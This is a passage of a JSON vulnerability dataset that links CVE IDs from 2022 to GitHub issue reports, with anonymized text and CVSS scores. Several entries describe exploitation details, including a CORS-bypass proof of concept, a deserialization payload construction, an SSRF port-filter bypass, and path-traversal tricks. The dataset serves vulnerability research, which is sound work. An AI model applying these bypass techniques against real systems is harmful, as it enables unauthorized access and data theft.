  78265. "Issue_Url_new": "https://github.com/eclipse/lemminx/issues/1169",
  78266. "Repo_new": "eclipse/lemminx",
  78267. "Issue_Created_At": "2022-02-07T10:38:32Z",
  78268. "description": "Bad SYSTEM for DTD APITAG and Entity breaks the XML validation. See URLTAG",
  78269. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  78270. "severity": "CRITICAL",
  78271. "baseScore": 9.1,
  78272. "impactScore": 5.2,
  78273. "exploitabilityScore": 3.9
  78274. },
  78275. {
  78276. "CVE_ID": "CVE-2022-0730",
  78277. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/4562",
  78278. "Issue_Url_new": "https://github.com/cacti/cacti/issues/4562",
  78279. "Repo_new": "cacti/cacti",
  78280. "Issue_Created_At": "2022-02-21T18:07:52Z",
  78281. "description": "Under certain LDAP server environments, Cacti authentication can be bypassed. Describe the bug Under certain LDAP server configurations (notably when anonymous binding is enabled), Cacti authentication can be bypassed with certain credential types. Expected behavior The Cacti security model should still hold when anonymous binding is enabled on the LDAP server.",
  78282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78283. "severity": "CRITICAL",
  78284. "baseScore": 9.8,
  78285. "impactScore": 5.9,
  78286. "exploitabilityScore": 3.9
  78287. },
  78288. {
  78289. "CVE_ID": "CVE-2022-0749",
  78290. "Issue_Url_old": "https://github.com/SinGooCMS/SinGooCMSUtility/issues/1",
  78291. "Issue_Url_new": "https://github.com/singoocms/singoocmsutility/issues/1",
  78292. "Repo_new": "singoocms/singoocmsutility",
  78293. "Issue_Created_At": "2021-12-08T13:29:42Z",
  78294. "description": "Vulnerability Report\uff1a APITAG security vulnerability. Risk PATHTAG FILETAG Set up socket communication server : FILETAG client : FILETAG Constructing the payload The APITAG method internally first calls the APITAG method to read the packet header NUMBERTAG bytes) of the socket object information, and then calls the APITAG method to read the length of the bytes in the packet header (int type) The APITAG method will first intercept NUMBERTAG bytes of information, so NUMBERTAG bytes must be added before the original payload when constructing the POC. The APITAG method reads the packet header information, i.e. the NUMBERTAG bytes of information needs to contain the byte length (int type) of the original payload, while intercepting the int data type before the ' ' ending. Also the Payload source code is converted to a byte array length of NUMBERTAG bytes. A local test of the APITAG method shows that the NUMBERTAG bytes of information could be NUMBERTAG Int NUMBERTAG is the byte length of the original payload. Simulating the transmission of messages to a socket client POC implementation using a controlled data transfer from the server to the socket client, i.e. a set payload. FILETAG FILETAG FILETAG",
  78295. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78296. "severity": "CRITICAL",
  78297. "baseScore": 9.8,
  78298. "impactScore": 5.9,
  78299. "exploitabilityScore": 3.9
  78300. },
  78301. {
  78302. "CVE_ID": "CVE-2022-0759",
  78303. "Issue_Url_old": "https://github.com/ManageIQ/kubeclient/issues/554",
  78304. "Issue_Url_new": "https://github.com/manageiq/kubeclient/issues/554",
  78305. "Repo_new": "manageiq/kubeclient",
  78306. "Issue_Created_At": "2022-03-23T10:28:21Z",
  78307. "description": "VULNERABILITY: Config defaults to APITAG when kubeconfig doesn't specify a custom CA. Dangerous bug present ever since APITAG was created URLTAG : Whenever the kubeconfig did not define a custom CA (the normal situation for production clusters with a public domain and certificate!), Config was returning ssl_options[:verify_ssl] hard-coded to APITAG : ( Assuming you passed those ssl_options to APITAG this means that instead of checking the server's certificate against your system CA store, it would accept ANY certificate, allowing easy man-in-the-middle (MITM) attacks. This is especially dangerous with user/password or token credentials, because a MITM attacker could simply steal those credentials to the cluster and do anything you could do on the cluster.",
  78308. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78309. "severity": "HIGH",
  78310. "baseScore": 8.1,
  78311. "impactScore": 5.9,
  78312. "exploitabilityScore": 2.2
  78313. },
  78314. {
  78315. "CVE_ID": "CVE-2022-0759",
  78316. "Issue_Url_old": "https://github.com/ManageIQ/kubeclient/issues/555",
  78317. "Issue_Url_new": "https://github.com/manageiq/kubeclient/issues/555",
  78318. "Repo_new": "manageiq/kubeclient",
  78319. "Issue_Created_At": "2022-03-23T10:33:18Z",
  78320. "description": "Config ignores APITAG field. Tightly related to NUMBERTAG also broken ever since APITAG was added (I'm fixing them together): APITAG field in kubeconfig was never honored. The distinction is that NUMBERTAG is about the default being dangerous, and this ticket is about inability to override the default (either way) by APITAG .",
  78321. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78322. "severity": "HIGH",
  78323. "baseScore": 8.1,
  78324. "impactScore": 5.9,
  78325. "exploitabilityScore": 2.2
  78326. },
  78327. {
  78328. "CVE_ID": "CVE-2022-0856",
  78329. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/65",
  78330. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/65",
  78331. "Repo_new": "cacalabs/libcaca",
  78332. "Issue_Created_At": "2022-02-24T09:19:26Z",
  78333. "description": "FILETAG",
  78334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78335. "severity": "MEDIUM",
  78336. "baseScore": 6.5,
  78337. "impactScore": 3.6,
  78338. "exploitabilityScore": 2.8
  78339. },
  78340. {
  78341. "CVE_ID": "CVE-2022-0918",
  78342. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/5242",
  78343. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/5242",
  78344. "Repo_new": "389ds/389-ds-base",
  78345. "Issue_Created_At": "2022-03-30T10:56:03Z",
  78346. "description": "Crafted message may crash the server. Issue Description A request containing crafted parameters may crash the server (denial of service). Package Version and Platform: all versions. Steps to Reproduce Expected results The server should not crash.",
  78347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78348. "severity": "HIGH",
  78349. "baseScore": 7.5,
  78350. "impactScore": 3.6,
  78351. "exploitabilityScore": 3.9
  78352. },
  78353. {
  78354. "CVE_ID": "CVE-2022-0981",
  78355. "Issue_Url_old": "https://github.com/quarkusio/quarkus/issues/23269",
  78356. "Issue_Url_new": "https://github.com/quarkusio/quarkus/issues/23269",
  78357. "Repo_new": "quarkusio/quarkus",
  78358. "Issue_Created_At": "2022-01-28T14:24:04Z",
  78359. "description": "Hibernate Reactive APITAG is closed. Describe the bug This may look similar to NUMBERTAG which was fixed in APITAG ) but this time the reproducer includes a resteasy reactive request filter (see APITAG in the reproducer). Here's the exception which is thrown randomly when the app is processing concurrent requests: ERRORTAG Expected behavior _No response_ Actual behavior _No response_ How to Reproduce? Reproducer: URLTAG Steps to reproduce the behavior: Start the app with APITAG Run FILETAG with APITAG The exception should show up in the log eventually \u2139\ufe0f If you change the Quarkus version to APITAG , the exception should never be thrown. As a consequence, this looks like a regression to us but I'll wait for a confirmation on that specific point before tagging the issue as a regression. Output of ERRORTAG or ver Linux APITAG NUMBERTAG APITAG NUMBERTAG SMP Mon No NUMBERTAG EST NUMBERTAG APITAG Output of APITAG openjdk version APITAG NUMBERTAG LTS APITAG version (if different from Java) _No response_ Quarkus version or git rev APITAG Build tool (ie. output of APITAG or APITAG ) _No response_ Additional information _No response_",
  78360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  78361. "severity": "HIGH",
  78362. "baseScore": 8.8,
  78363. "impactScore": 5.9,
  78364. "exploitabilityScore": 2.8
  78365. },
  78366. {
  78367. "CVE_ID": "CVE-2022-0982",
  78368. "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/164",
  78369. "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/164",
  78370. "Repo_new": "xebd/accel-ppp",
  78371. "Issue_Created_At": "2022-01-04T06:09:13Z",
  78372. "description": "Vulnerability Disclosure. Dear accel ppp Development Team, I have filed a vulnerability disclosure by email to dev APITAG APITAG Please let me know when it is patched and we can use this issue for tracking purposes. Thanks!",
  78373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78374. "severity": "CRITICAL",
  78375. "baseScore": 9.8,
  78376. "impactScore": 5.9,
  78377. "exploitabilityScore": 3.9
  78378. },
  78379. {
  78380. "CVE_ID": "CVE-2022-0991",
  78381. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/1238",
  78382. "Issue_Url_new": "https://github.com/admidio/admidio/issues/1238",
  78383. "Repo_new": "admidio/admidio",
  78384. "Issue_Created_At": "2022-03-13T08:12:47Z",
  78385. "description": "Sessions should be invalidated if the password was changed. If a user changes their password (e.g. in the profile or with the password-forgotten function) we should invalidate all sessions and auto-logins of that user. This is necessary so the user can be sure that the new password is required everywhere and that a compromised password cannot continue to be used through an already-saved session.",
  78386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  78387. "severity": "HIGH",
  78388. "baseScore": 7.1,
  78389. "impactScore": 4.2,
  78390. "exploitabilityScore": 2.8
  78391. },
  78392. {
  78393. "CVE_ID": "CVE-2022-1122",
  78394. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1368",
  78395. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1368",
  78396. "Repo_new": "uclouvain/openjpeg",
  78397. "Issue_Created_At": "2021-07-13T08:56:46Z",
  78398. "description": "An issue of freeing an uninitialized pointer exists in PATHTAG and will cause a segfault. Hi, I found a segmentation fault in current master, and I also reproduced it on the latest released version NUMBERTAG Crash Summary\uff1a An issue of freeing an uninitialized pointer exists in PATHTAG in main; it can lead to a segmentation fault via the POC provided below. Crash Analysis NUMBERTAG run command: ./opj_decompress APITAG input APITAG BMP NUMBERTAG If there are lots of files in the imgdir directory, that will cause a malloc failure FILETAG NUMBERTAG Then, since the pointer dirptr >filename is not initialized, free(dirptr >filename) fails (free of an uninitialized pointer) FILETAG GDB debugging results\uff1a FILETAG FILETAG",
  78399. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78400. "severity": "MEDIUM",
  78401. "baseScore": 5.5,
  78402. "impactScore": 3.6,
  78403. "exploitabilityScore": 1.8
  78404. },
  78405. {
  78406. "CVE_ID": "CVE-2022-1209",
  78407. "Issue_Url_old": "https://github.com/ultimatemember/ultimatemember/issues/989",
  78408. "Issue_Url_new": "https://github.com/ultimatemember/ultimatemember/issues/989",
  78409. "Repo_new": "ultimatemember/ultimatemember",
  78410. "Issue_Created_At": "2022-04-01T12:22:47Z",
  78411. "description": "Security issues in URL and social fields. Isolating the problem (mark completed items with an [x]): [x] I have deactivated other plugins and confirmed this bug occurs when only the Ultimate Member plugin is active. [x] This bug happens with a default APITAG theme active, or [UM Theme URLTAG . FILETAG Image NUMBERTAG View mode FILETAG Image NUMBERTAG Edit mode FILETAG Image NUMBERTAG View mode FILETAG",
  78412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78413. "severity": "MEDIUM",
  78414. "baseScore": 5.4,
  78415. "impactScore": 2.7,
  78416. "exploitabilityScore": 2.3
  78417. },
  78418. {
  78419. "CVE_ID": "CVE-2022-1211",
  78420. "Issue_Url_old": "https://github.com/tildearrow/furnace/issues/325",
  78421. "Issue_Url_new": "https://github.com/tildearrow/furnace/issues/325",
  78422. "Repo_new": "tildearrow/furnace",
  78423. "Issue_Created_At": "2022-03-29T07:31:17Z",
  78424. "description": "FILETAG I use fuzz tests, so I don't analyze these crashes in detail. I packaged the POC file so you can reproduce the error.",
  78425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78426. "severity": "MEDIUM",
  78427. "baseScore": 6.5,
  78428. "impactScore": 3.6,
  78429. "exploitabilityScore": 2.8
  78430. },
  78431. {
  78432. "CVE_ID": "CVE-2022-1213",
  78433. "Issue_Url_old": "https://github.com/LiveHelperChat/livehelperchat/issues/1752",
  78434. "Issue_Url_new": "https://github.com/livehelperchat/livehelperchat/issues/1752",
  78435. "Repo_new": "livehelperchat/livehelperchat",
  78436. "Issue_Created_At": "2022-04-03T16:23:58Z",
  78437. "description": "SSRF Filter bypass port NUMBERTAG Recently, I found a bypass of the mechanism that only accepts port NUMBERTAG by using multiple ports. Because PHP parses the URL port as whatever follows the last colon, the hostname becomes \"evil NUMBERTAG FILETAG With this the code will ignore the URL port NUMBERTAG and use \"evil NUMBERTAG as the hostname FILETAG APITAG FILETAG",
  78438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  78439. "severity": "HIGH",
  78440. "baseScore": 8.1,
  78441. "impactScore": 5.2,
  78442. "exploitabilityScore": 2.8
  78443. },
  78444. {
  78445. "CVE_ID": "CVE-2022-1227",
  78446. "Issue_Url_old": "https://github.com/containers/podman/issues/10941",
  78447. "Issue_Url_new": "https://github.com/containers/podman/issues/10941",
  78448. "Repo_new": "containers/podman",
  78449. "Issue_Created_At": "2021-07-15T12:56:50Z",
  78450. "description": "podman top not work with userns=keep id container. Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description Steps to reproduce the issue NUMBERTAG top with userns=keep id container ERRORTAG NUMBERTAG top with normal container CODETAG NUMBERTAG Describe the results you received: Describe the results you expected: Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : APITAG",
  78451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78452. "severity": "HIGH",
  78453. "baseScore": 8.8,
  78454. "impactScore": 5.9,
  78455. "exploitabilityScore": 2.8
  78456. },
  78457. {
  78458. "CVE_ID": "CVE-2022-1341",
  78459. "Issue_Url_old": "https://github.com/vgropp/bwm-ng/issues/26",
  78460. "Issue_Url_new": "https://github.com/vgropp/bwm-ng/issues/26",
  78461. "Repo_new": "vgropp/bwm-ng",
  78462. "Issue_Created_At": "2020-04-27T04:26:24Z",
  78463. "description": "Vulnerability? Bug? NULL pointer write in the get_cmdln_options function in src/options.c. Hi, In src/options.c, line NUMBERTAG APITAG may fail, and str will then be NULL. str=(char )malloc(strlen(pwd_entry >pw_dir NUMBERTAG the following write then goes through the NULL pointer: snprintf(str,strlen(pwd_entry >pw_dir NUMBERTAG s/.bwm ng.conf\",pwd_entry >pw_dir); I think this is a vulnerability, and maybe we can patch it as follows (check the malloc result before using it)? str=(char )malloc(strlen(pwd_entry >pw_dir NUMBERTAG if(!str) return Thanks for any consideration! Peiyu Liu, NESA lab, Zhejiang University",
  78464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78465. "severity": "HIGH",
  78466. "baseScore": 7.5,
  78467. "impactScore": 3.6,
  78468. "exploitabilityScore": 3.9
  78469. },
  78470. {
  78471. "CVE_ID": "CVE-2022-1441",
  78472. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2175",
  78473. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2175",
  78474. "Repo_new": "gpac/gpac",
  78475. "Issue_Created_At": "2022-04-16T08:21:46Z",
  78476. "description": "GPAC NUMBERTAG APITAG stack overflow with unlimited length and controllable content in APITAG Description When GPAC tries to parse an MP4 file, it calls the function APITAG to read from the video. In this function, it allocates a buffer str of fixed length. However, the content read from bs is controllable by the user, and so is the length, which causes a buffer overflow. APITAG Impact Since the video content is fully controllable by users, an unlimited length will cause a stack overflow, corrupting the canary or potentially leading to a shell. Mitigation We can set a length limit on it, bounding the read to less than NUMBERTAG byte. See pull request URLTAG . Reproduce On Ubuntu NUMBERTAG make with this. APITAG Run the following command with APITAG APITAG You may get a stack smashing detected error, which indicates that the stack canary was overwritten. APITAG GDB CODETAG Credits xdchase",
  78477. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78478. "severity": "HIGH",
  78479. "baseScore": 7.8,
  78480. "impactScore": 5.9,
  78481. "exploitabilityScore": 1.8
  78482. },
  78483. {
  78484. "CVE_ID": "CVE-2022-1554",
  78485. "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3128",
  78486. "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3128",
  78487. "Repo_new": "clinical-genomics/scout",
  78488. "Issue_Created_At": "2022-02-02T15:47:08Z",
  78489. "description": "Fix crashes and tighten down file access for the file endpoint. When the container's mounts of the expected filesystems go down, this can happen: ERRORTAG Also, it wouldn't hurt to add checks that the user is only asking for files belonging to cases they actually have access to (an authorization check, not just authentication). It would take quite some guessing of case names etc. to access them, but it might be possible to combine this with some other situation where we feel that info is trivial to show. Also worth glitch checking. \ud83d\ude2c",
  78490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  78491. "severity": "HIGH",
  78492. "baseScore": 7.5,
  78493. "impactScore": 3.6,
  78494. "exploitabilityScore": 3.9
  78495. },
  78496. {
  78497. "CVE_ID": "CVE-2022-1554",
  78498. "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3302",
  78499. "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3302",
  78500. "Repo_new": "clinical-genomics/scout",
  78501. "Issue_Created_At": "2022-04-19T06:22:15Z",
  78502. "description": "Refactor endpoint so that PATHTAG can't be used without being authenticated. Check the use case from this report: URLTAG Reproduce: APITAG Then `curl path as is ' URLTAG",
  78503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  78504. "severity": "HIGH",
  78505. "baseScore": 7.5,
  78506. "impactScore": 3.6,
  78507. "exploitabilityScore": 3.9
  78508. },
  78509. {
  78510. "CVE_ID": "CVE-2022-1592",
  78511. "Issue_Url_old": "https://github.com/Clinical-Genomics/scout/issues/3325",
  78512. "Issue_Url_new": "https://github.com/clinical-genomics/scout/issues/3325",
  78513. "Repo_new": "clinical-genomics/scout",
  78514. "Issue_Created_At": "2022-05-05T05:38:38Z",
  78515. "description": "Server Side Request Forgery (SSRF) in remote_cors . We knew it was coming. Report is here: URLTAG I have no idea how to fix this vulnerability yet. Have to read about SSRF!",
  78516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
  78517. "severity": "HIGH",
  78518. "baseScore": 8.2,
  78519. "impactScore": 4.2,
  78520. "exploitabilityScore": 3.9
  78521. },
  78522. {
  78523. "CVE_ID": "CVE-2022-1706",
  78524. "Issue_Url_old": "https://github.com/coreos/ignition/issues/1300",
  78525. "Issue_Url_new": "https://github.com/coreos/ignition/issues/1300",
  78526. "Repo_new": "coreos/ignition",
  78527. "Issue_Created_At": "2022-01-11T14:00:58Z",
  78528. "description": "Security when using VMware to store the Ignition config? We thought that only root should be able to view the config, but it turns out any (non-root) user seems to be able to get the whole config from VMware? APITAG How can we handle secrets in the Ignition config? For example disk encryption keys or other sensitive config for systemd services we declare there?",
  78529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  78530. "severity": "MEDIUM",
  78531. "baseScore": 6.5,
  78532. "impactScore": 3.6,
  78533. "exploitabilityScore": 2.8
  78534. },
  78535. {
  78536. "CVE_ID": "CVE-2022-1706",
  78537. "Issue_Url_old": "https://github.com/coreos/ignition/issues/1315",
  78538. "Issue_Url_new": "https://github.com/coreos/ignition/issues/1315",
  78539. "Repo_new": "coreos/ignition",
  78540. "Issue_Created_At": "2022-01-29T21:54:19Z",
  78541. "description": "Consider deleting userdata from provider after Ignition completes . Feature Request Environment At least GCP, APITAG APITAG Desired Feature Some platforms allow modifying or removing userdata using APIs accessible from the VM instance. On those platforms, consider deleting the Ignition config from the platform after Ignition completes. Other Information Ignition configs may contain sensitive information that should not be accessible from workloads running on the machine. We currently do nothing to help users with sensitive userdata, and there is no documentation about the issue ( URLTAG On platforms with network metadata services, the user can write an Ignition config that firewalls off the metadata service (not documented in Fedora APITAG URLTAG On platforms with in hypervisor metadata accessible by non root users (at least APITAG firewalling isn't an option, and the user must delete the metadata themselves or pursue awkward workarounds like denylisting kernel modules. Various minimalistic fixes are possible. We could publish docs on adding a systemd service that disables userdata access. If an external tool is necessary, we could ship it or recommend adding it to the OS. Or we could recommend that APITAG check the platform ID and disable userdata access themselves. However, we generally try to keep Ignition secure by default. I think it would make sense to delete userdata automatically wherever we have an API to do so. This is most important for platforms that can't be remediated by firewalling, but is still a worthwhile improvement on the others. On platforms where we can't delete userdata, we could log a warning recommending that users firewall or otherwise mitigate their risk. In principle this would be a compatibility break, since it's possible for other software in the instance (or on a VM host) to intentionally access userdata. 
APITAG would be hacky, since the userdata must be formatted as an Ignition config for Ignition to care about it, but it's conceivable.) If we're concerned about this, we could add an Ignition config field ( APITAG ?) configuring whether Ignition performs the deletion. I think the default should certainly be true after the next major spec bump, but the short term default is less clear, especially for old specs that don't have the field. We'd need to delete userdata after Ignition completes, not after fetch succeeds. There are two reasons: kargs changes may reboot the machine and refetch userdata, and a failed Ignition run may be retried by the OS (since Ignition is mostly idempotent). Platform notes AWS Network metadata service. Userdata can be changed with the APITAG control plane request, but there's no instance side API. Control plane access is probably out of scope for us. Azure On FCOS and RHCOS, Azure userdata access is already disabled at runtime, outside Ignition's control. Azure doesn't allow full access to a VM until it \"checks in\" to report that it has provisioned successfully, and this checkin causes Azure to disable access to the config drive. Checkin is handled by Afterburn, which runs in the initramfs on RHCOS (to avoid long delays for console access) and in the real root on FCOS (for eventual integration with automatic rollback: URLTAG It may or may not make sense to move this into Ignition. APITAG Network metadata service does not appear to support changing userdata. GCP Network metadata service with support for deleting userdata. Some discussion in URLTAG Packet Network metadata service does not appear to support changing userdata. qemu fw_cfg userdata is only accessible by root. Write support was removed in URLTAG We also support config drives on non NUMBERTAG APITAG Guest properties can be modified from inside the guest. They're FILETAG as being accessible only to root, but it still seems useful to remove userdata. 
APITAG Userdata is accessible by non root users. It can be stored directly in guestinfo or in an XML document in guestinfo, and we'd have to handle both cases. See NUMBERTAG",
  78542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  78543. "severity": "MEDIUM",
  78544. "baseScore": 6.5,
  78545. "impactScore": 3.6,
  78546. "exploitabilityScore": 2.8
  78547. },
  78548. {
  78549. "CVE_ID": "CVE-2022-1707",
  78550. "Issue_Url_old": "https://github.com/duracelltomi/gtm4wp/issues/224",
  78551. "Issue_Url_new": "https://github.com/duracelltomi/gtm4wp/issues/224",
  78552. "Repo_new": "duracelltomi/gtm4wp",
  78553. "Issue_Created_At": "2022-05-09T20:42:33Z",
  78554. "description": "No security policy. Hi MENTIONTAG Do you have a private email or contact information for security disclosures? If so, can you add that to your security policy on APITAG Cheers!",
  78555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  78556. "severity": "MEDIUM",
  78557. "baseScore": 6.1,
  78558. "impactScore": 2.7,
  78559. "exploitabilityScore": 2.8
  78560. },
  78561. {
  78562. "CVE_ID": "CVE-2022-1993",
  78563. "Issue_Url_old": "https://github.com/gogs/gogs/issues/7002",
  78564. "Issue_Url_new": "https://github.com/gogs/gogs/issues/7002",
  78565. "Repo_new": "gogs/gogs",
  78566. "Issue_Created_At": "2022-06-03T13:53:58Z",
  78567. "description": "Path Traversal in Git HTTP endpoints. Describe the bug The report on huntr.dev URLTAG Code of Conduct [X] I agree to follow this project's Code of Conduct",
  78568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  78569. "severity": "HIGH",
  78570. "baseScore": 8.1,
  78571. "impactScore": 5.2,
  78572. "exploitabilityScore": 2.8
  78573. },
  78574. {
  78575. "CVE_ID": "CVE-2022-1996",
  78576. "Issue_Url_old": "https://github.com/emicklei/go-restful/issues/489",
  78577. "Issue_Url_new": "https://github.com/emicklei/go-restful/issues/489",
  78578. "Repo_new": "emicklei/go-restful",
  78579. "Issue_Created_At": "2022-03-29T12:40:35Z",
  78580. "description": "security] Authorization Bypass Through User Controlled Key. MENTIONTAG following on from NUMBERTAG and URLTAG we are sharing the details of the report as requested in the APITAG . Authorization Bypass Through User Controlled Key in [emicklei/go restful URLTAG Reported on Mar NUMBERTAG th NUMBERTAG Description Hello go restful maintainer team, I would like to report a security concerning your CORS Filter feature. Go restful allows user to specify a CORS Filter with a configurable APITAG param which is an array of domains allowed in CORS policy. However, although there's is already another param called APITAG used for matching origin using regular expression, all domains in APITAG is also used as regular expression to check for matching origin in this code in file cors_filter.go: if APITAG NUMBERTAG compile allowed domains to allowed origin patterns APITAG err := APITAG if err != nil { return false } APITAG = APITAG } for _, pattern := range APITAG { if allowed = APITAG allowed { break } } So by this, if the user input example.com to be one of domain in APITAG all domains starting with example.com would be acceptable. Proof of Concept Install go restful and create a file main.go with this content: package main import ( restful PATHTAG \"io\" \"net/http\" ) func APITAG { container := APITAG ws := APITAG APITAG APITAG server := APITAG NUMBERTAG Handler: container} APITAG cors := APITAG APITAG ]string{\"X My Header\"}, APITAG APITAG APITAG true, Container: container, } APITAG APITAG } func hello(req APITAG resp APITAG { APITAG \"world\") } In the above code, example.com is configured as an allowed domain. 
Run the above code and access link /hello with Origin Header = APITAG and see that the request gets through CORS policy and response looks like this: HTTP NUMBERTAG OK Access Control Allow Credentials: true Access Control Allow Origin: APITAG Access Control Expose Headers: X My Header Date: Mon NUMBERTAG Mar NUMBERTAG GMT Content Length NUMBERTAG Content Type: text/plain; charset=utf NUMBERTAG Connection: close world Impact This vulnerability is capable of breaking CORS policy and thus allowing any page to make requests, retrieve data on behalf of other users. Occurrences [cors_filter.go L NUMBERTAG URLTAG",
  78581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  78582. "severity": "CRITICAL",
  78583. "baseScore": 9.1,
  78584. "impactScore": 5.2,
  78585. "exploitabilityScore": 3.9
  78586. },
  78587. {
  78588. "CVE_ID": "CVE-2022-2063",
  78589. "Issue_Url_old": "https://github.com/nocodb/nocodb/issues/2262",
  78590. "Issue_Url_new": "https://github.com/nocodb/nocodb/issues/2262",
  78591. "Repo_new": "nocodb/nocodb",
  78592. "Issue_Created_At": "2022-06-04T18:38:08Z",
  78593. "description": "Who to contact for security issues. Hello \ud83d\udc4b I run a security community that finds and fixes vulnerabilities in OSS. A researcher ( APITAG has found a potential issue, which I would be eager to share with you. Could you add a APITAG file with an e mail address for me to send further details to? APITAG recommends URLTAG a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future. Looking forward to hearing from you \ud83d\udc4d (cc APITAG helper)",
  78594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78595. "severity": "HIGH",
  78596. "baseScore": 8.8,
  78597. "impactScore": 5.9,
  78598. "exploitabilityScore": 2.8
  78599. },
  78600. {
  78601. "CVE_ID": "CVE-2022-21221",
  78602. "Issue_Url_old": "https://github.com/valyala/fasthttp/issues/1226",
  78603. "Issue_Url_new": "https://github.com/valyala/fasthttp/issues/1226",
  78604. "Repo_new": "valyala/fasthttp",
  78605. "Issue_Created_At": "2022-02-21T11:25:44Z",
  78606. "description": "Path Traversal Attacks. Hello, I found a problem with path traversal ( URLTAG If you specify a backslash NUMBERTAG c) character in the path, then you can still traverse with /../ and read data from the root. It may be worth adding a check for the path fragment /..\\ in addition to /../. APITAG = []byte(\"/.. ). At your discretion. Thanks.",
  78607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  78608. "severity": "HIGH",
  78609. "baseScore": 7.5,
  78610. "impactScore": 3.6,
  78611. "exploitabilityScore": 3.9
  78612. },
  78613. {
  78614. "CVE_ID": "CVE-2022-21646",
  78615. "Issue_Url_old": "https://github.com/authzed/spicedb/issues/358",
  78616. "Issue_Url_new": "https://github.com/authzed/spicedb/issues/358",
  78617. "Repo_new": "authzed/spicedb",
  78618. "Issue_Created_At": "2021-12-31T13:51:57Z",
  78619. "description": "unexpected expand/lookup behaviour with wildcard permissions. Reproduction: URLTAG As I run some experiments with the new wildcard permissions feature, I stumbled upon an apparently unexpected behaviour when doing lookup/expand. Permissions that effectively end up in APITAG behave correctly with Check API, but not with APITAG API (which is presumably what's used in the validation tab in the playground). In the original issue, we discussed that APITAG will have special treatment to APITAG relationship when performing APITAG API, which is reasonable because it would lead to \"listing all users\" phenomenon. However, when APITAG is chained with other algebraic operators like APITAG and APITAG , I think the current implementation semantics seem unexpected. The desirable outcome would be: APITAG APITAG",
  78620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  78621. "severity": "HIGH",
  78622. "baseScore": 8.1,
  78623. "impactScore": 5.2,
  78624. "exploitabilityScore": 2.8
  78625. },
  78626. {
  78627. "CVE_ID": "CVE-2022-21672",
  78628. "Issue_Url_old": "https://github.com/lfs-book/make-ca/issues/19",
  78629. "Issue_Url_new": "https://github.com/lfs-book/make-ca/issues/19",
  78630. "Repo_new": "lfs-book/make-ca",
  78631. "Issue_Created_At": "2022-01-08T15:44:30Z",
